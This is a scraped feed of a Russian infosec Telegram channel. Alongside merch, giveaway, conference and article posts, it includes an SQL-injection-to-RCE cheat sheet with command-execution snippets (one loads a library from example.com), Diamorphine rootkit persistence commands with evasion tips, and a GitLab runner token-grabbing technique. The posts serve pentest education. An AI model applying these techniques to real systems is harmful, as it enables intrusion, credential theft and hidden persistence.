Похек

Продажи футболок на сайте снова открыты :)
https://shop.poxek.cc

Предзаказа не активны на данный момент, я сразу отменяю такие заказы. Попозже отключу функцию предзаказа

Мои коллеги недавно выпустили PentAGI.

Что это ? Это мультиагентная система, которая проводит пентест(сейчас это веб-приложения).

Там есть несколько агентов. Агенты задаются различными инструкциями и есть агент который управляет всей системой. Промпты можем посмотреть тут:

https://github.com/vxcontrol/pentagi/tree/master/backend/pkg/templates/prompts - тут можем посмотреть.

Система использует инструменты из докерного образа kali. И в целом это крутое решение, собранный образ без проблем может быть запущен где-либо.

А инструментов тут достаточно много, больше 20.

Есть приятный графический интерфейс а также вы можете мониторить действия, которые совершают агенты через интеграцию Grafana/Prometheus.

В качестве управляющей модели можно использовать GPT, CLAUDE, DeepSeek. А по итогу работы инструмента вы конечно же получаете отчёт, содержащий уязвимости.

Сам проект доступен на гитхабе. И авторы активно призывают к развитию проекта. Вы можете потестировать его и оставить свои предложения в issue на гитхабе. А вот и демка с демонстрацией того как инструмент работает.

https://pentagi.com/

Когда пилишь курсы и сам кидаешь мемы про курсы
#meme

🌚 @poxek

Passkey technology is elegant, but it’s most definitely not usable security
#passkey #google #apple #microsoft

В статье подробно рассматриваетсч технология Passkey, предназначенная для замены паролей с использованием асимметричной криптографии и биометрической аутентификации. Несмотря на элегантность концепции, автор подчеркивает сложности, возникающие при ее практическом применении.

➡️ Основные технические аспекты и проблемы:

➡️Разнородность реализаций: Поддержка Passkey внедрена в различных браузерах, операционных системах и веб-сайтах, что приводит к несогласованности в пользовательском опыте. Например, процесс входа с использованием Passkey на PayPal отличается в зависимости от используемой платформы и браузера, а некоторые сайты вовсе не поддерживают определенные браузеры.

➡️Привязка к экосистемам: Многие платформы стремятся привязать пользователей к своим собственным решениям для синхронизации Passkey, что затрудняет использование одной и той же Passkey на разных устройствах и в разных экосистемах. Это создает препятствия для пользователей, желающих использовать независимые менеджеры паролей для хранения и синхронизации своих Passkey

➡️Сложности восстановления доступа: В случае утраты устройства с сохраненной Passkey процесс восстановления доступа к учетной записи может быть затруднительным. Многие сервисы предлагают менее безопасные методы восстановления, что снижает общую безопасность системы.

➡️Атаки типа "Adversary-in-the-Middle" (AitM): Злоумышленники могут использовать атаки посредника, изменяя страницы входа и скрывая опции аутентификации через Passkey, вынуждая пользователей использовать менее безопасные методы входа, подверженные фишингу.

Автор приходит к выводу, что, несмотря на потенциал Passkey в повышении безопасности и удобства аутентификации, текущие реализации сталкиваются с серьезными проблемами, препятствующими их широкому и эффективному применению. Для достижения истинно беспарольного будущего необходимо преодолеть эти технические и организационные барьеры.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK

Расскажите кто как Новый Год проводит?) 🌚

Поздравляю с Новым Годом!! ❤️❤️❤️

Вот и закончились абсолютно все меропроятия, рабочие встречи и т.д.

👉 Заболел :( Я умудрился посадить голос и простыть. Иммунитет всё таки не выдержал -_0.0_-
👉 Отдых. Постараюсь отдохнуть на этих выходных. Отвечать буду только на важные вопросы, по остальным поводам буду в архив кидать и прочитаю по наличию желания
👉 Рекламодателям: информационные размещения возобновятся с 9 января, тогда же когда и банки откроются. Но можете с 7-8 числа заранее бронировать даты через моего менеджера @not_savely, мне по вопросам рекламы более писать не нужно.

🔺 Важно. В следующем году ожидайте релиз моей платформы обучения aka LMS (я знаю, что некоторым обещал в Q3 этого года, но как вышло - так вышло) и курсов на ней. Будут бесплатные и платные курсы, направления курсов более чем актуальные будут. Так что stay tuned!
Будет выборочное закрытое бета тестирование. Если кому интересен стек, то это Go + NextJS. Если есть годные идеи или решения, что мне предложить, то велком в ЛС @szybnev, но просьба начинать сообщение с #lms, чтобы я не пропустил ваше сообщение.

📆 В целом этот год для меня уже мысленно закончился. Уверено скажу, что он получился настолько тяжелый, насколько продуктивный.

🌚 Мои пожелания вам:
👉 Work&Work - это п**дец, вывозить это на трезвую вообще не реально, поэтому советую качественно и системно давать себе отдых.
👉 Быстрый рост максимально коррелицируется с сжигаем нервных клеток, поэтому заботьтесь о своем физическом и психологиском состоянии, потом ещё спасибо скажите)
👉 Но в противовес своих слов ранее скажу, что пока ты молодой/молодая - есть возможность прожечь N% здоровья, чтобы стать крутым спецом, но лучше иногда недобдеть, чем потом тратить заработанные деньги на врачей и не свой отдых)

С этой минуты беру радио молчанию и желаю всем провести отлично праздники)

☕️ Всех с наступающим!

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK

Последний митап в этом году от Кибхак - топовое ИБ сообщество в МИРЭА

P.S. фотки докладов в чате))
@poxek_chat

«Байки безопасности» выпустили второй и заключительный ролик в этом году. Я его посмотрел и мне было очень приятно послушать их, моментами посмеяться, а то как Максим Хараск кайфовал в кадре и не описать 😁 Всем бы такую харизматичность и открытость)

Ребята обсудили:
1. Как вливаться в рабочий ритм в после праздников. Если кратко, то никак 😁 Но более интересные размышления ребята выдали в подкасте.
2. Рынок ИБ для B2C. Тут не буду вам спойлерить, их полезно послушать.
3. Из прикольных тем было про токсичность ИБ-комьюнити. Это холиварная тема, моё мнение, что ИБ тем самым переваривает тех, кто пытается ей заниматься и работает как естественный отбор, потому что объективно ИБ требует нехилой моральной выдержки.


Сегодня последний рабочий день в году, поэтому включить на фоне подкастик и немного напитаться предновогодней ИБ атмосферой, я считаю хорошим решением)

Смотреть подкаст тута 📺 YouTube | 📺 VK

☕️ Всех с наступающим!

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK

Итоги года Похек
#итоги_года

+9к подписчиков
Более тысячи постов за год
3,4 МИЛЛИОНА просмотров
Около 37к репостов
5 тысяч комментариев
Около 15к реакций на постах

Это цифры космические какие-то.... Большое вам спасибо!!❤️❤️

All I Want for Christmas is a CVE-2024-30085 Exploit
#windows #privesc #microsoft

Статья от StarsLab - это те самые ребята, что отрепортили пачку CVE в 1C Bitrix, так что статья как минимум достойна вашего внмания)

CVE-2024-30085 is a heap-based buffer overflow vulnerability affecting the Windows Cloud Files Mini Filter Driver cldflt.sys. By crafting a custom reparse point, it is possible to trigger the buffer overflow to corrupt an adjacent _WNF_STATE_DATA object. The corrupted _WNF_STATE_DATA object can be used to leak a kernel pointer from an ALPC handle table object. A second buffer overflow is then used to corrupt another _WNF_STATE_DATA object, which is then used to corrupt an adjacent PipeAttribute object. By forging a PipeAttribute object in userspace, we are able to leak the token address and override privileges to escalate privileges to NT AUTHORITY\SYSTEM.

➡️Читать далее
➡️Video PoC (тот же, что прикреплен к посту)
📱 Github PoC

☕️ Всех с наступающим!

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча Продажи закрыты до следующего года

CVE-2024-30085 PoC

Надзор за Sysmon. Защищаем мониторинг от атак штатными средствами Windows
#харденинг #windows #sysmon

На пути ата­кующе­го час­то сто­ят сис­темы EDR, цель которых — обна­ружить ата­ку и сооб­щить о ней пер­вой линии обо­роны SOC. Что­бы оста­вать­ся незаме­чен­ными, пен­тесте­рам при­ходит­ся обхо­дить монито­ринг. В этой статье погово­рим о том, как имен­но это дела­ется в слу­чае с ата­ками на Windows.
Как извес­тно, один из основных механиз­мов Windows, на который полага­ются боль­шинс­тво решений клас­са EDR, — это Event Tracing for Windows. Он как пос­тавля­ет дан­ные для фор­мирова­ния алер­тов, так и дела­ет записи в при­выч­ном нам жур­нале событий (в отдель­ных слу­чаях).

Ра­нее мы уже раз­бирали, как ата­кующие могут воз­дей­ство­вать на под­систе­му ETW, что­бы сде­лать Sysmon мак­сималь­но бес­полез­ным. В этом матери­але мы пос­мотрим, как эти тех­ники мож­но детек­тировать (как ни стран­но, но с помощью того же самого ETW).

🔓 Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Попытались меня сейчас развести якобы от лица моего телефонного оператора

Назвали мои данные: ФИО, номер телефона, СНИЛС, ИНН. Якобы закончился срок действия номера телефона и предложили или продлить, или заменить на другой. Я чёт как лопух во всё поверил, т.к. очень грамотно ссылались на законодательные акты о перс данных, случаях серых симок и т.д.

Последнее, что остановило: СМС от госуслуг, где сука написано: Смена пароля и код для подтверждения, который нужно было назвать боту. Вот тут я уже трубку сбросил.

Будьте бдительны и не видетесь на новую разводку ❤️

Новогодний опрос про ваш опыт прохождения курсов в этом году 🌚

Опрос анонимный, данные никуда не уйдут 😹

👉 Отвечать ТУТ 👈

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | ☕️ Всем новогоднего настроения!

Разбор одного вируса с ТГ канала peekbot
#malware

Автор решил написать эту заметку, чтобы помочь потенциальными жертвам подобных раздач вирусов, люди пытаются найти способы смотреть ютуб, а находят майнер в свою ОС. Здесь будут приведены все пруфы которые я смог собрать специально заражая этим вирусом отдельную машину с Windows 10.

На ТГ канале peekbot при поддержке его ютубканала peekbot, с видеоинструкциями по установке и настройке, раздаётся файл с вирусом-майнером, внедренный в известный многим пакет zapret.zip с гитхаба, который меняет формат пакетов tcp/ip чтобы "ускорить" старые "медленные сервера" googlevideo и не только. Заранее просьба ко всем - подайте жалобы на эти TG и Youtube каналы с указанием на вирус-майнер. Жертв вируса будет намного меньше если эти каналы исчезнут, там сейчас очень много незадачливых подписчиков (30к на ТГ и 61К а Ютубе).

➡️ Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | ☕️ Всем новогоднего настроения!

Очень по новогоднему, максимально подняли настроение сегодня. А ещё классная открытка с личными поздравлениями, что очень умилительно)

Большое спасибо команда BIZONE BugBounty <3 ❤️

BI.ZONE прислал подарки на Новый Год, как комьюнити партнеру :)

Сейчас будет распакоувка

Расскажите про свои самые странные/кринжовые и веселые/позитивные истории связанные с собеседованиями.

Я начну: у меня есть лучший друг, который готовился на собес в один красный телеком и за пару минут до собеса, этот же телеком перестал работать во всём доме. Лицо друга представляете?)

Бывают случаи, когда вы получаете доступ к Gitlab'у в рамках пентест проекта. Но что делать кроме клона доступных репозиториев?

Если у нас есть права в рамках gitlab или репозитория, вы можете зарегистрировать gitlab runner и сделать hijack в репозиторий, куда запулят во время работы скрипта. Дальше вы получите в grabbed_data.json с токенами. Большим плюсом является то, что джоба не падает, что позволяет не привлекать не нужное внимание разработчика или тем более appsec/devsecops. Безуслоно техника не новая, но полезно о ней помнить)

⭐️ Github

💎 Cheatsheet от snovvcrash

⭐️ Ресерч от индуса

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

В течение дня свяжусь с победителями
Отписал
Отправил)

🎉 Результаты розыгрыша:

Победители:
1. Никита (@nickmoebiusec)
2. Mikhail (@shashinma)
3. посошочек (@dbbqqp)
4. С₉H₁₈O₆
5. Maksim (@t1oximin)

Проверить результаты

Напоминаю, что этот конкурс закончится завтра!

Все футболки отправлены

Редтим до того, как его стали так называть
#meme

🌚 @poxek @poxek_meme

SQLi to RCE

На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)

Исполниться можно в контекстах разных баз данных:
1. MSSQL 💻
2. MySQL 😗
3. PostgreSQL 💻
4. Oracle 🤪
5. SQLite 🤝 (не нашел emoji :))

MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры xp_cmdshell. Конечно, должны присутствовать необходимые привилегии, чтобы ее включить, так как по дефолту она выключена. После этого можно выполнять команды:

EXEC xp_cmdshell 'dir c:\';

MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:

SELECT sys_eval('whoami');

PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу plpythonu для исполнения python когда прямо из SQL.

-- create extension
CREATE EXTENSION IF NOT EXISTS plpythonu;

-- define the malicious function
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS void AS $$
import os
os.system(cmd)
$$ LANGUAGE plpythonu;

-- execute command
SELECT exec_cmd('whoami');

2 - Загрузка функции напримую из libc например

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('whoami');

3- Команда PROGRAM

ORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)

SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:

UNION SELECT 1,load_extension('\\example.com\mal_extension.so', 'MainFuncCall')

или например с помощью load_file() прочитать закрытые ключи SSH (этот подход можно применять и в других бдшках)


Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)

#SQLi #RCE

В течение дня свяжусь с победителями
Отписал

🎉 Результаты розыгрыша:

Победители:
1. Валерий (@valerius_r)
2. Azorik (@Azor1k)
3. Peka (@peka_boyarin)
4. Gshar (@Gshar4)
5. Ann (@AnnMax1703)

Проверить результаты

👉 Мой взгляд на тимлидство в сфере пентеста. В целом руководство более двумя людьми за раз открыл для себя в этом году. Опыт очень интересный и захватывающий)
Почему начал развитие вертикально? Всю жизнь был чисто задротом интровертом технарём, даже социопатичным в какой-то степени, хотя сейчас в этом сложно поверить. Решил для себя открыть новое направление развития, т.к. моя деятельность с каналом качает мои soft скиллы, а тимлидство это одно из лучших применений этих навыков.
С какими сложностями столкнулся? Я сложный по характеру человек и частенько какие-то споры воспринимаю в штыки, что плохо, но что есть. Поэтому первой стеной было принятие странности других людей, стараться понять человека и найти с ним общий язык, что пока получается.
Чем дальше в лес — тем больше дров. Как правильно мне сказал Лёша Федулаев, а ему его тимлид. Если хочешь быть большим руководителем, то учись руководить любым человеком.
Надо ли оно конкретно тебе? Не знаю 🐇. Каждый решает для себя сам. Я за этот год увидел много людей, которые с точки зрения карьерной лестницы уже давно могли стать руководителями отдела, но они не хотят и в этом что-то есть. Если ты понимаешь, что тебе достаточно денег, ты не хочешь больше ответственности и времени уделять работы — то это твой осознанный выбор быть тем, кем ты хочешь)

👉 Развитие моего подхода к пентестам. Когда ещё был скрипткидди, конечно пользовался только сканерами и не мог вручную какие-то CVE раскрутить. Затем открыл для себя мир кучи cli фаззеров, сканеров, чекеров и т.д. 100500 раз пробовал это всё заворачивать в bash или python скрипты, но по итогу результат был слишком не разборчив, не удобен и по итогу бесполезен. На первом месте работы пентестором, очень часто с коллегой спорили что лучше, автоматизация или ручной поиск. Каждый правда со своим мнением оставался)) Потом перейдя в следующую компанию, снова встретился с Автоматика Vs Ручки. Но тогда коллега показывал какие-то запредельные результаты относительного моего метода поиска и я стал всё больше и больше погружаться в ручной поиск. И знаете что? Да это охренено)) Закапываться в бизнес логику приложений, понимать специфику компании в какой-то сфере и от этого рассчитывать риски — это то что меня драйвит последний год наверное. Я всё также люблю автоматизацию, сейчас преимущественно пишу на Go, из-за простоты, лаконичности и кросс-платформенности. Хотя также были и есть коллеги, кто не пользуется никакой автоматикой и это тоже нормально. Я это вижу как другой склад ума и если этот подход у человека показывает классные результаты — ну и замечательно)

👉 Отношение к написанию отчетов. Знаю, что это была и будет болезненной темой для пентестеров и багхантеров. Я тоже до этого года не любил их писать. Писал хорошо, но без души и удовольствия. А потом начал общаться 1to1 с клиентом в одной из предыдущих компаний. И оказалось, что им мои XSS, IDOR ничего не говорят)) Тогда я сделал выводы и начал формировать рекомендации, описания к уязвимостям и т.д. отталкиваясь от запросов и проблем бизнеса. Советую багхантерам тоже придерживаться такого подхода. Вам даже немного проще в контексте того, что если у вендора есть триаж команда, то она зачастую технически подкована, а на обычных пентестах такого обычно не бывает. Хотя меня очень порадовала в этом году скорость обработки критов из отчётов по пентесту, т.е. очень быстрые фиксы.

А у вас есть новогоднее настроение? Лично у меня нет, но я вот накупил подарков близким и когда подарю, буду доволен как Дед Мороз)
До Нового Года кстати осталось всего 2 недели, заметили?) Мне вот только вчера про это напомнили 👩

Решил пока есть хорошее настроение, написать пару постов с итогами года для меня и канала. Посты будут поделены на части, так что можете прочитать только важное для себя)

👉 Спасибо! Первое что хотелось сказать, что Я с Вами сделал х2 рост по всем направлениям: личностно, канал, медиа, зп конечно не х2, но некий икс тоже пресутствует) Без Вас ничего бы этого не было, поэтому большущее вам спасибо! 😊

👉 Конференции. За этот год я даже не смог посчитать на скольки конференциях был, точно более 30, и это только то что я не забывал в календаре отмечать. Реальное число думаю переваливает за 40. Поэтому я считаю, что могу резюмировать свой опыт и назвать его достаточно объективным.
1. База — не все конференции интересны, полезны и стоят внимания. Но есть другая грань этой мысли — если вы только начинаете свой путь в какой-то ни было сфере, будь-то ИБ, маркетинг, предпринимательство или даже юриспруденция. Посещайте конференции в начале, как можно больше. Будьте губкой, которая впитывает все возможные знания в себя. Бесполезных знаний не бывает в начале пути. Но потом, когда вы уже стали отважной петрушкой и понимаете, что тут вы ничего нового не узнаете, знакомых нет — ходить конечно не стоит. А если допустим доклады вам не интересны, но есть шанс выбраться с коллегами из офиса - вай нот?
2. Все конференции можно четко разделить на категории, просто посмотря на доклады и участников конференции.
2.1. Бизнесовые конференции классно, если вы хотите развиваться не только как технический специалист, но и иметь подвешенный язык при общении с заказчиками. Из тех что мне понравились: КОД ИБ, ГАРДА Сохранить Всё
2.2. Комьюнити ивенты - я бы сюда отнёс OFFZONE, UnderConf, Yandex Yet Another Security Meetup, VK Security Confab и приватки: Assume Birch, Zakeq, Xakep Meetup и т.д.
2.3. Около гос конференции. Тут зачастую только для пиджаков, причем дорогих) Мне лично такие конференции не заходят, т.к. не мой профиль, но к примеру бумажным ИБ специалистам, они наверное будут полезны.
2.4. Общего назначение, т.е. b2c+b2b+b2g. Из таких, это мероприятия от PT: PHD Fest, Кибердом. Что-то среднее между всем.
3. Начало конференций с 8-10 утра. Можно конечно сказать, что я ленивая жепка и просыпаюсь поздно, но судя по невыспавшимся лицам остальных 99% людей, над этим стоить задуматься и начинать позже. Ничего страшного не будет, если компании будут делать более ёмкие программы докладов с расчётом на начало в 12 к примеру. Даже скоре это к лучшему, более концентрированные доклады улучшат имидж конференции.
4. Кейтеринг (еда). Я конференции посещаю последние лет 6 своей жизни и видел разный кейтеринг, даже пару раз его организовывал. Я понимаю специфику и проблемы этого направления, но когда крупнейшие компании не заботятся о базовой потребности своих гостей, это грустно. От меня пожелания - протестировать что-то кроме микромалекулярной кухни, которой во-первых не насытишься, во-вторых не все такое едят банально. Из очень крутого кейтеринга в Q4 отмечу Bugs Zone, ИБ Митап (были очень вкусные воки, которые готовили при гостях. Это дополнительный перформанс, сытно, не так дорого как кажется) и последний в этом году митап Яндекса, где было очень вкусное мясо и других разнообразные сытные закуски (но это уже явно дорого)). А вообще можете сказать, что я жирный и мне надо меньше есть и будете правы :D

🕘 1 день до окончания регистрации на «Совкомбанк SecureHack». Внеси свой вклад в разработку решения для защиты информационных систем банка. Регистрация открыта до 4 декабря: https://cnrlink.com/securehackpohek

Приглашаем разработчиков, системных аналитиков, специалистов в области информационной безопасности и архитекторов ПО. Можно участвовать индивидуально или в командах до 3 человек.

Основная задача — разработать инструмент для оценки безопасности информационных систем банка, который будет полезен как для разработчиков и аналитиков ИБ, так и для проектных менеджеров. 

Вы сможете: 
🔹Побороться за призовой фонд в 300 000 рублей. 
🔹Решить практическую задачу с использованием современных инструментов и подходов к безопасности. 
🔹Расширить свои компетенции и поработать с командой над междисциплинарным проектом.
🔹Показать свои навыки ведущим ИБ-специалистам и получить шанс присоединится к команде Совкомбанк Технологии.

Кроме того, для участников хакатона подготовили материал для подготовки – статья о современном подходе к разработке инструментов оценки безопасности приложений и информационных систем: https://cnrlink.com/securehackcybermediaarticle

Таймлайн хакатона:
🔸06.12 — старт работы над задачей
🔸15.12 — завершение загрузки решений
🔸19.12 — награждение победителей

Оставляйте заявку на участие до 4 декабря, изучайте материалы и готовьтесь к старту хакатона: https://cnrlink.com/securehackpohek

Реклама. ПАО "Совкомбанк". ИНН: 4401116480. erid: LjN8Jvwkn

Поговаривают, что зиродей в docs файлах рассылаемых фишингом нашли, в активных публичных образцах песка any.run

https://x.com/anyrun_app/status/1861024182210900357

Ловится сигма-рулом на обращения офисных аппликух на не локальные IP (вложение Office Application Initiated Network Connection To Non-Local IP.yml)

IOC:
SHA256

450221ee3d9144ca03e1058d3ba0e5ad09b4153341676089db9e244662b89800

AV Detection Ratio: 🔴 0 / 62

Всех с предновогодним настроением, даже тем у кого только рабочее настроение)

Channel photo updated

Я тебя найду и позвоню
#маркетинг #приватность

Абсолютно легальные инструменты за смешные деньги могут позволить вам звонить всем активным клиентам ваших конкурентов, построить десяток эффективных мошеннических схем или даже позвонить предполагаемому любовнику вашей девушки/жены, а заодно проверить, где она была вчера вечером! Обнаружил я это в ходе одного из расследований утечек клиентов. И я твердо уверен, что такого быть не должно. Инструмент, использующийся в статье, эффективнее утечек баз. Нашими данными не должны так легко легально торговать практически в режиме онлайн. Можно найти любого, куда он ходит, где живет и спит, и позвонить им. Почему и как это работает, какие риски это несет и как этому противодействовать? Расскажу далее.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Ахтунг! Алярма! Промокод на 2 месяца для Caido Pro, без подписок, «картона», лайков, репостов и прочей чепухи. Активировать нужно успеть до 4 декабря (если точнее, то до 07:59 04.12.2024).

Смело кликай, чтобы явить своему взору это великолепие: FEYMI-S4MGL-SDXBM-TV1MD.

Активируется это чудо здесь, прямо посередине увидишь манящую красную кнопку (Redeem Voucher), призывающую незамедлительно использовать (Redeem) промокод.

Такие дела.

#caido #promocode #free #share #pro

⚠️Attacking Docker Collection ⚠️ by Reza Rashidi, 2024

Attacking Docker involves exploiting vulnerabilities, misconfigurations, and weaknesses in various components of the Docker ecosystem, including Docker Engine, container images, orchestration platforms (e.g., Kubernetes), and the underlying host system. Attackers may leverage techniques such as container breakout, privilege escalation, denial-of-service (DoS), image tampering, and lateral movement to compromise Docker environments and gain unauthorized access to sensitive data or resources.

- Privileged Container;
- Exposed Container APIs;
- Container Escape;
- Container Image Tampering;
- Insecure Container Configuration;
- Denial-of-Service (DoS);
- Kernel Vulnerabilities;
- Shared Kernel Exploitation;
- Insecure Container Orchestration;
- Insecure Container Images;
- References.

#SecDevOps

😆BUGS ZONE 3.0 позади, делимся итогами

На прошлой неделе встретились с нашими самыми активными исследователями, чтобы отметить завершение ивента. 

В ходе официальной части определили пять победителей двухнедельного хантинга. Ими стали:

1️⃣brain
2️⃣crusher
3️⃣savAnna
4️⃣adsec2s
5️⃣Solembumm

А потом всех участников ждали бирпонг, караоке и другие классные активности.

Спасибо всем, кто был с нами. Отдельно благодарим спикеров за топовый контент и вендоров за участие и активности ;)

Фотографии уже доступны в альбоме VK, а когда будут готовы записи докладов, мы выпустим о них отдельный пост.

Crafting your bug bounty methodology: A complete guide for beginners
#intigriti #bugbounty #багбаунти #дляначинающих

Bug bounty hunting can seem overwhelming when you're just starting, especially when you are coming from a non-technical background. And even then, bug bounty (or web security in general) is a vast topic with so much to grasp.

Participating in bug bounties often also means competing along on bug bounty programs where thousands of other hunters are also actively hacking, with some participants having years of experience. In this article, we are going to cover how you as a beginner bug bounty hunter can navigate around the bug bounty world, and craft your methodology to still be able to find unique and undiscovered vulnerabilities.

Let's dive in!

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Увидел в других каналов тревожные посты про то, что на их аккаунты сделали фейки и пишут различные не хорошие вещи.

Аккаунт админа только один @szybnev. Ни у кого денег не выпрашиваю, никакого отношения к поддержке недружественных стран не имею и не поддерживаю их позицию.

Пост на всякий случай, надеюсь на ваше понимание

Главная аналитическая конференция по кибербезопасности Код ИБ ИТОГИ в Москве совсем скоро!

📆 Дата: 5 декабря
📍 Место: Москва, отель Palmira Business Club (ул. Новоданиловская набережная 6, к.2)

Конец года — лучшее время, чтобы в кругу профессионалов изучить аналитику, узнать последние тренды ИБ и прогнозы для принятия верных решений. Поэтому ждем вас на конференции Код ИБ ИТОГИ.

Буду на этой конференции 👩

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Linux Persistence with LKM

Существуют десятки актуальных способов закрепления в Linux, а также инструментов автоматизации этой задачи, например один из последних - PANIX, это bash скрипт, который мы используем на киберучениях в рамках Purple Team.
Но в формате активного противодействия, редко есть возможности тащить на тачку разные скрипты, поэтому мы рассмотрим ручной способ на примере LKM (Loadable kernel module) руткита Diamorphine.

Diamorphine хорошо известный руткит с открытым исходным кодом, который активно используется злоумышленниками в дикой природе уже много лет, который можно загрузить различными способами. Наиболее распространенный - это просто положить в /etc/modules или использовать службу systemd-modules-load. Файлы конфигурации модулей systemd-modules-load ищет в следующих директориях: /etc/modules-load.d, /usr/lib/modules-load.d, /usr/local/lib/modules-load.d, /run/modules-load.d
🔴 Необходимо каким-то образом доставить Diamorphine или собрать из исходников на тачке, например в контейнере или еще как-нибудь, обычно зависит от уровня зрелости мониторинга и степени паранойи SOC на текущем проекте😁
🔴 Во время компиляции Diamorphine позволяет указать "magic string" - строку в начале наименования файла или директории, которую руткит автоматически скроет при загрузке, например apt1337
🔴 Копируем руткит и создаем список зависимостей modules.dep
cp diamorphine.ko /usr/lib/modules/$(uname -r)/kernel/drivers/block/apt1337-diamorphine.ko
depmod
🔴 Создаем файл конфигурации systemd-modules-load
echo apt1337-diamorphine >/usr/lib/modules-load.d/apt1337-not_evil.conf
🔴 Загружаем модуль вручную
modprobe apt1337-diamorphine

Таким образом, при каждой перезагрузке системы руткит в качестве модуля LKM будет загружаться автоматически😎 Безусловно техника базовая и довольно распространенная, поэтому нуждается в доработке относительно сокрытия. Как минимум рекомендую использовать Timestomping для файлов в /usr/lib/modules/* и использовать менее очевидный нейминг.
Но все равно это будет светиться в /proc/sys/kernel/tainted так как загруженный модуль не подписан, но это уже тема другой заметки😁

Как мы строили платформу на базе Kubernetes и старались не скатиться в «Кубер с аутентификацией»
#контейнеры #k8s #kubernetes #pod

Есть колоссальная разница между тем, чтобы поднять на коленке небольшой кластерок Kubernetes на 5 воркеров для небольшого отдела разработчиков и внедрить его в виде полноценной платформы в большой компании. В домашней лаборатории или небольшом отделе вы почти не сталкиваетесь с вынужденно тяжеловесными бизнес-процессами и необходимостью заставить корректно работать вместе не только ПО разных версий, но и множество людей.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Нет ничего грустнее, чем RCE в Bitrix, которая срабатывает не до конца(

Системный подход к успешной сдаче OSCP 2024
#OSCP #OffensiveSecurity

Широко известная в узких кругах организация «Offensive Security» является флагманом в области кибербезопасности, предлагая специалистам уникальные образовательные программы и сертификационные курсы, направленные на детальное погружение в сферу тестирования на проникновение.

Самой популярной и широко известной является сертификация Offensive Security Certified Professional (OSCP). В сентябре текущего года я успешно сдал экзамен и хочу поделиться опытом подготовки, а также рассмотреть совершенные ошибки.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Как мы обучали LLM для поиска уязвимостей в смарт-контрактах Solidity
#web3 #solidity #LLM

Идея использовать LLM для анализа смарт-контрактов Solidity показалась крайне заманчивой. Загрузить код, запустить модель — и она сама находит уязвимости, генерирует отчет, а иногда даже предлагает исправления. Звучит отлично! Но, как показал мой опыт, между «звучит» и «работает» лежит огромная пропасть.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Организаторы Underconf выложили доклады

➡️https://plvideo.ru/@underconf/videos

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🔒 Бизнес хочет недорого бороться с угрозами. CISO — выстроить максимально надёжный периметр. На бумаге можно спроектировать любую сложную систему защиты. Но найти на неё бюджет — целое искусство.

Учиться ему будем 22 ноября в 12:00 на вебинаре от MTC Web Services!

➡️ Зарегистрироваться ⬅️

В прямом эфире Виктор Бобыльков, CISO MTC Web Services, и Лев Палей, CISO «Вебмониторэкс», обсудят:

🔴Фреймворки по обоснованию затрат на кибербезопасность
🔴Как грамотно распределить бюджет на ИБ
🔴Какие альтернативы решению WAF есть в вашем распоряжении

Вы узнаете:
🟡Какие противоречия возникают между бизнесом и ИБ
🟡Какие затраты заложить на типовую архитектуру защиты веб-приложений
🟡Если бюджет порезали: на чём можно и нельзя экономить

🎁 Готовьте свои вопросы для экспертов: за лучший из них по традиции будет подарок от команды.

Приходите!

а я снова с опросом по мерчу))
Какой вариант делаем?
Футболки кстати будут новые 🌚

Такие разные Android AppLinks, WebLinks, DeepLinks. Разбираемся и пытаемся сломать
#android #mobilepentest #mobile

С каждым годом мобильные приложения становятся всё более сложными и взаимосвязанными, предлагая пользователям бесшовный опыт взаимодействия. Одной из ключевых частей этого опыта являются ссылки, которые могут направить пользователя прямо на определённый экран приложения или на конкретный контент. Однако многие (как и мы до того, как написать эту статью) путают такие термины, как Deep Links, Web Links и App Links, что может привести к ошибкам в реализации и уязвимостям.

Цель этой статьи — разобраться в различиях между этим похожим функционалом, понять, какие атаки могут быть на них направлены и как ведёт себя Android, если несколько приложений пытаются зарегистрировать одни и те же ссылки. Сразу оговорюсь, что это статья не совсем похожа на наши обычные материалы — она призвана скорее рассказать, что мы узнали в процессе внутреннего исследования и консолидировать эту информацию в небольших "заметках на полях".

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Yandex Another Security Meetup

🌚 @poxek

Kerberoasting для FreeIPA. Как я искал доступ к домену, а нашел CVE
#xakep #pentestaward

